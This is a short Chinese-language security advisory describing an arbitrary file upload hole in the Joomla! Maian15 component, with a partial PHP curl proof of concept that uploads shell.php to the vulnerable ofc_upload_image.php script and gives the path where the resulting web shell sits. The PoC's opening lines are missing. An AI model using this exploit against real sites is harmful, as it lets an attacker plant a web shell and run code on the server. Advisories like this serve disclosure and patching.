Joomla! Maian15 Component ‘name’参数任意shell上传漏洞

漏洞起因
输入验证错误
危险等级

影响系统
Joomla! Maian15

不受影响系统

危害
远程攻击者可以利用漏洞可上传任意文件并执行。
CVSSv2:

攻击所需条件
攻击者必须访问Joomla! Maian15。

漏洞信息
Joomla!是一套在国外相当知名的内容管理系统。
Joomla! Maian15组件’charts/php-ofc-library/ofc_upload_image.php’不正确校验用户提交的上传请求,允许攻击者利用漏洞上传任意PHP文件并以WEB权限执行。

测试方法
“;
$ch =
curl_init(“http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell =
http://www.example.com/path/administrator/components/com_maian15/charts/tmp-upload-images/shell.php
安全建议

厂商解决方案
目前没有详细解决方案提供:
http://www.joomla.org/

漏洞提供者
SultanHaikal

评论关闭。